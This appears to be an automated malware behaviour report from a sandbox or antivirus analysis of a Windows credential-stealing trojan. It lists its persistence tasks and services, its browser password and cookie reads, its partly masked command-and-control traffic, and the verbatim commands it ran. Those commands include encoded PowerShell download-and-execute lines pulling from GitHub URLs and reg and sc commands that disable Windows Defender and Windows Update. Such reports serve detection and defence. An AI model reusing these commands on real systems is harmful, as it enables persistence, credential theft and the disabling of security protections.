Technical Information
To ensure autorun and distribution
Creates or modifies the following files
- <SYSTEM32>\tasks\microsoft\windows\shell\updshell
- <SYSTEM32>\tasks\microsoft\windows\autochk\systemproxy
- <SYSTEM32>\tasks\microsoft\windows\mobilepc\detectpc
- <SYSTEM32>\tasks\googlechromeupdatetask
- <SYSTEM32>\tasks\update shell
- %HOMEPATH%\start menu\programs\startup\updip.lnk
Creates the following services
- [<HKLM>\System\CurrentControlSet\Services\WinDefends] 'ImagePath' = 'cmd /c powershell -exec bypass -w 1 -ec aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBD...
- [<HKLM>\System\CurrentControlSet\Services\thundersec] 'ImagePath' = 'cmd /c powershell -exec bypass -w 1 -ec aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBD...
- [<HKLM>\System\CurrentControlSet\Services\WindowsNetworkSVC] 'ImagePath' = 'cmd /c powershell -w 1 -exec bypass -e aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAG...
- [<HKLM>\System\CurrentControlSet\Services\t1t2t3] 'ImagePath' = 'cmd /c powershell -w 1 -e ZABvACAAewAkAHAAaQBuAGcAIAA9ACAAdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAtAGMAbwBtAHAAIABnAG8AbwBnAG...
Malicious functions
To bypass firewall, removes or modifies the following registry keys
- [<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] 'DisableNotifications' = '00000001'
- [<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DisableNotifications' = '00000001'
To complicate detection of its presence in the operating system,
blocks execution of the following system utilities:
- Windows Update
Downloads
- https://gist.githubusercontent.com/mysslacc/a5b184d9d002bf04007c4bbd2a53eeea/raw/c6f8b4c36e48425507271962855f3e2ac695f99f/baseba
- https://raw.githubusercontent.com/mysslacc/thd/master/base
Injects code into
the following system processes:
- %WINDIR%\syswow64\notepad.exe
Terminates or attempts to terminate
the following system processes:
- <SYSTEM32>\cmd.exe
- %WINDIR%\syswow64\explorer.exe
Searches for registry branches where third party applications store passwords
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook]
- [<HKCU>\Software\Martin Prikryl\WinSCP 2\Sessions\]
Reads files which store third party applications passwords
- %LOCALAPPDATA%\google\chrome\user data\default\cookies
- %LOCALAPPDATA%\google\chrome\user data\default\web data
- %HOMEPATH%\desktop\alert.html
- %HOMEPATH%\desktop\api-hashmap.html
- %HOMEPATH%\desktop\file_p_00000000_1371597592.docx
- %HOMEPATH%\desktop\holycrosschurchinstructions.docx
- %HOMEPATH%\desktop\issi2013_template_for_posters.docx
- %HOMEPATH%\desktop\ituneshelpunavailable.html
- %HOMEPATH%\desktop\trivial-merge.html
Modifies file system
Creates the following files
- %TEMP%\clp.exe
- %TEMP%\2fda\api-ms-win-crt-process-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-runtime-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-stdio-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-string-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-time-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-utility-l1-1-0.dll
- %TEMP%\2fda\freebl3.dll
- %TEMP%\2fda\mozglue.dll
- %TEMP%\2fda\msvcp140.dll
- %TEMP%\2fda\nss3.dll
- %TEMP%\2fda\nssdbm3.dll
- %TEMP%\2fda\softokn3.dll
- %TEMP%\2fda\ucrtbase.dll
- %TEMP%\2fda\vcruntime140.dll
- %TEMP%\110743766085643862972.tmp
- %TEMP%\11074685765321218541474.tmp
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %TEMP%\1118531551241596473882.tmp
- %TEMP%\11185001726879722025451.tmp
- %TEMP%\11185005703127113210.tmp
- %TEMP%\11184846668474157415461.tmp
- %TEMP%\1118484723518623744991.tmp
- %TEMP%\1118468336184447113290.tmp
- %TEMP%\111842159122749312254.tmp-shm
- %TEMP%\11184533999476162067345.tmp
- %TEMP%\111842159122749312254.tmp
- %TEMP%\1118343538049646706683.tmp
- %TEMP%\11183282643546659879144.tmp
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %TEMP%\11185313832751725807810.tmp
- %TEMP%\2fda\api-ms-win-crt-private-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-multibyte-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-math-l1-1-0.dll
- %PROGRAMDATA%\updip\updip.exe
- %TEMP%\2fda\api-ms-win-core-console-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-datetime-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-debug-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-errorhandling-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-file-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-file-l1-2-0.dll
- %TEMP%\2fda\api-ms-win-core-file-l2-1-0.dll
- %TEMP%\2fda\api-ms-win-core-handle-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-heap-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-interlocked-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-libraryloader-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-localization-l1-2-0.dll
- %TEMP%\2fda\api-ms-win-core-memory-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-namedpipe-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-processenvironment-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-processthreads-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-heap-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-filesystem-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-environment-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-convert-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-conio-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-util-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-sysinfo-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-timezone-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-synch-l1-2-0.dll
- %TEMP%\2fda\api-ms-win-core-synch-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-string-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-profile-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-processthreads-l1-1-1.dll
- %TEMP%\2fda\api-ms-win-crt-locale-l1-1-0.dll
- %TEMP%\11185313832751725807810.tmp-shm
Deletes the following files
- %TEMP%\110743766085643862972.tmp
- %TEMP%\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-string-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-synch-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-synch-l1-2-0.dll
- %TEMP%\2fda\api-ms-win-core-sysinfo-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-timezone-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-util-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-conio-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-convert-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-environment-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-filesystem-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-heap-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-locale-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-multibyte-l1-1-0.dll
- %TEMP%\2fda\ucrtbase.dll
- %TEMP%\2fda\api-ms-win-crt-private-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-process-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-runtime-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-stdio-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-string-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-time-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-utility-l1-1-0.dll
- %TEMP%\2fda\freebl3.dll
- %TEMP%\2fda\mozglue.dll
- %TEMP%\2fda\msvcp140.dll
- %TEMP%\2fda\nss3.dll
- %TEMP%\2fda\nssdbm3.dll
- %TEMP%\2fda\softokn3.dll
- %TEMP%\2fda\api-ms-win-core-profile-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-math-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-processthreads-l1-1-1.dll
- %TEMP%\11185313832751725807810.tmp
- %TEMP%\11074685765321218541474.tmp
- %TEMP%\11183282643546659879144.tmp
- %TEMP%\1118343538049646706683.tmp
- %TEMP%\111842159122749312254.tmp-shm
- %TEMP%\111842159122749312254.tmp
- %TEMP%\11184533999476162067345.tmp
- %TEMP%\1118468336184447113290.tmp
- %TEMP%\1118484723518623744991.tmp
- %TEMP%\11184846668474157415461.tmp
- %TEMP%\11185005703127113210.tmp
- %TEMP%\11185001726879722025451.tmp
- %TEMP%\1118531551241596473882.tmp
- %TEMP%\11185313832751725807810.tmp-shm
- %TEMP%\2fda\api-ms-win-core-console-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-processenvironment-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-datetime-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-debug-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-errorhandling-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-file-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-file-l1-2-0.dll
- %TEMP%\2fda\api-ms-win-core-file-l2-1-0.dll
- %TEMP%\2fda\api-ms-win-core-handle-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-heap-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-interlocked-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-libraryloader-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-localization-l1-2-0.dll
- %TEMP%\2fda\api-ms-win-core-memory-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-namedpipe-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-processthreads-l1-1-0.dll
- %TEMP%\2fda\vcruntime140.dll
Network activity
TCP
HTTP POST requests
- http://me###arka.xyz/ynvs2/index.php
UDP
- DNS ASK gi##.###hubusercontent.com
- DNS ASK google.com
- DNS ASK ra#.####ubusercontent.com
- DNS ASK me###arka.xyz
- DNS ASK gi##ab.com
Miscellaneous
Creates and executes the following
- '%TEMP%\clp.exe'
- '%PROGRAMDATA%\updip\updip.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -w 1 -exec bypass -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQANAAoAYwBtAGQAIAAvAGMAIAByAGUAZwAgAGEAZA...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c sc start thundersec' (with hidden window)
- '%TEMP%\clp.exe' ' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /f /tn "Update Shell" /sc hourly /mo 5 /tr "powershell -w 1 -C IEX ([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($(Get-ItemProperty -Path H...' (with hidden window)
- '<SYSTEM32>\sc.exe' create t1t2t3 binpath= "cmd /c powershell -w 1 -e ZABvACAAewAkAHAAaQBuAGcAIAA9ACAAdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAtAGMAbwBtAHAAIABnAG8AbwBnAGwAZQAuAGMAbwBtACAALQBjAG8AdQBuAHQAIAAxACA...' (with hidden window)
- '<SYSTEM32>\sc.exe' start t1t2t3' (with hidden window)
- '<SYSTEM32>\sc.exe' delete t1t2t3' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -w 1 -exec bypass -ec JABjAG8AbQAgAD0AIAAiAFUAdwBCAGwAQQBIAFEAQQBMAFEAQgBOAEEASABBAEEAVQBBAEIAeQBBAEcAVQBBAFoAZwBCAGwAQQBIAEkAQQBaAFEAQgB1AEEARwBNAEEAWgBRAEEAZwBBAEMAMABBAFIAQQBCAHAAQQBIAE0AQQB...
- '%WINDIR%\syswow64\schtasks.exe' /create /tn \Microsoft\Windows\MobilePC\DetectPC /tr "cmd /c sc start WindowsNetworkSVC" /sc hourly /mo 1 /RL HIGHEST /RU "NT AUTHORITY\SYSTEM" /f
- '<SYSTEM32>\cmd.exe' /c sc start thundersec
- '<SYSTEM32>\sc.exe' start thundersec
- '<SYSTEM32>\cmd.exe' /c powershell -exec bypass -w 1 -ec aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwA...
- '%WINDIR%\syswow64\cmd.exe' /c cmd /c schtasks /f /create /tn "GoogleChromeUpdateTask" /sc hourly /mo 3 /tr "cmd /c %PROGRAMDATA%\updip\updip.exe"
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /f /create /tn "GoogleChromeUpdateTask" /sc hourly /mo 3 /tr "cmd /c %PROGRAMDATA%\updip\updip.exe"
- '%WINDIR%\syswow64\schtasks.exe' /f /create /tn "GoogleChromeUpdateTask" /sc hourly /mo 3 /tr "cmd /c %PROGRAMDATA%\updip\updip.exe"
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /f /tn "Update Shell" /sc hourly /mo 5 /tr "powershell -w 1 -C IEX ([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($(Get-ItemProperty -Path H...
- '%WINDIR%\syswow64\cmd.exe' /c SCHTASKS /create /tn \Microsoft\Windows\Shell\updshell /sc hourly /f /mo 8 /tr "cmd /c sc start WinDefends" /ru "NT AUTHORITY\SYSTEM" /RL HIGHEST
- '%WINDIR%\syswow64\schtasks.exe' /create /f /tn "Update Shell" /sc hourly /mo 5 /tr "powershell -w 1 -C IEX ([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($(Get-ItemProperty -Path HKCU:\Softwar...
- '%WINDIR%\syswow64\cmd.exe' /c powershell -w 1 -exec bypass -e JABvAGIAagBTAGgAZQBsAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIAAoACIAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAAiACkADQAKACQAbwBiAGoAUwBoAG...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -w 1 -exec bypass -e JABvAGIAagBTAGgAZQBsAGwAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIAAoACIAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAAiACkADQAKACQAbwBiAGoAUwBoAG8AcgB0AEMAdQB0...
- '%WINDIR%\syswow64\cmd.exe' /c timeout /t 4 && "%PROGRAMDATA%\updip\updip.exe"
- '%WINDIR%\syswow64\timeout.exe' /t 4
- '%WINDIR%\syswow64\notepad.exe'
- '<SYSTEM32>\sc.exe' create t1t2t3 binpath= "cmd /c powershell -w 1 -e ZABvACAAewAkAHAAaQBuAGcAIAA9ACAAdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAtAGMAbwBtAHAAIABnAG8AbwBnAGwAZQAuAGMAbwBtACAALQBjAG8AdQBuAHQAIAAxACA...
- '<SYSTEM32>\sc.exe' start t1t2t3
- '<SYSTEM32>\cmd.exe' /c powershell -w 1 -e ZABvACAAewAkAHAAaQBuAGcAIAA9ACAAdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAtAGMAbwBtAHAAIABnAG8AbwBnAGwAZQAuAGMAbwBtACAALQBjAG8AdQBuAHQAIAAxACAALQBRAHUAaQBlAHQAfQAgAHUAbgB...
- '%WINDIR%\syswow64\sc.exe' create WindowsNetworkSVC binpath= "cmd /c powershell -w 1 -exec bypass -e aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8...
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /tn \Microsoft\Windows\MobilePC\DetectPC /tr "cmd /c sc start WindowsNetworkSVC" /sc hourly /mo 1 /RL HIGHEST /RU "NT AUTHORITY\SYSTEM" /f
- '%WINDIR%\syswow64\cmd.exe' /c sc create WindowsNetworkSVC binpath= "cmd /c powershell -w 1 -exec bypass -e aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAb...
- '%WINDIR%\syswow64\sc.exe' delete WindowsNetworkSVC
- '%WINDIR%\syswow64\cmd.exe' /c sc delete WindowsNetworkSVC
- '%WINDIR%\syswow64\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\cmd.exe' /c sc stop wuauserv
- '%WINDIR%\syswow64\sc.exe' stop wuauserv
- '%WINDIR%\syswow64\cmd.exe' /c sc config wuauserv start= disabled
- '%WINDIR%\syswow64\sc.exe' config wuauserv start= disabled
- '%WINDIR%\syswow64\cmd.exe' /c sc delete WinDefends
- '%WINDIR%\syswow64\sc.exe' delete WinDefends
- '%WINDIR%\syswow64\cmd.exe' /c sc create WinDefends binpath= "cmd /c powershell -exec bypass -w 1 -ec aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -e ZABvACAAewAkAHAAaQBuAGcAIAA9ACAAdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAtAGMAbwBtAHAAIABnAG8AbwBnAGwAZQAuAGMAbwBtACAALQBjAG8AdQBuAHQAIAAxACAALQBRAHUAaQBlAHQAfQAgAHUAbgB0AGkAbAAgACgAJ...
- '%WINDIR%\syswow64\cmd.exe' /c mklink "%PROGRAMDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\updip" %PROGRAMDATA%\updip\updip.exe
- '%WINDIR%\syswow64\sc.exe' create WinDefends binpath= "cmd /c powershell -exec bypass -w 1 -ec aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkA...
- '%WINDIR%\syswow64\cmd.exe' /c sc delete thundersec
- '%WINDIR%\syswow64\sc.exe' delete thundersec
- '%WINDIR%\syswow64\cmd.exe' /c sc create thundersec binpath= "cmd /c powershell -exec bypass -w 1 -ec aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8...
- '%WINDIR%\syswow64\sc.exe' create thundersec binpath= "cmd /c powershell -exec bypass -w 1 -ec aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkA...
- '%WINDIR%\syswow64\cmd.exe' /c SCHTASKS /create /tn \Microsoft\Windows\Autochk\SystemProxy /sc hourly /f /mo 1 /tr "cmd /c sc start thundersec" /ru "NT AUTHORITY\SYSTEM" /RL HIGHEST
- '%WINDIR%\syswow64\schtasks.exe' /create /tn \Microsoft\Windows\Autochk\SystemProxy /sc hourly /f /mo 1 /tr "cmd /c sc start thundersec" /ru "NT AUTHORITY\SYSTEM" /RL HIGHEST
- '%WINDIR%\syswow64\cmd.exe' /c SCHTASKS /tn \Microsoft\Windows\Autochk\SystemProxy /run
- '%WINDIR%\syswow64\schtasks.exe' /tn \Microsoft\Windows\Autochk\SystemProxy /run
- '%WINDIR%\syswow64\cmd.exe' /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\schtasks.exe' /create /tn \Microsoft\Windows\Shell\updshell /sc hourly /f /mo 8 /tr "cmd /c sc start WinDefends" /ru "NT AUTHORITY\SYSTEM" /RL HIGHEST
- '<SYSTEM32>\sc.exe' delete t1t2t3
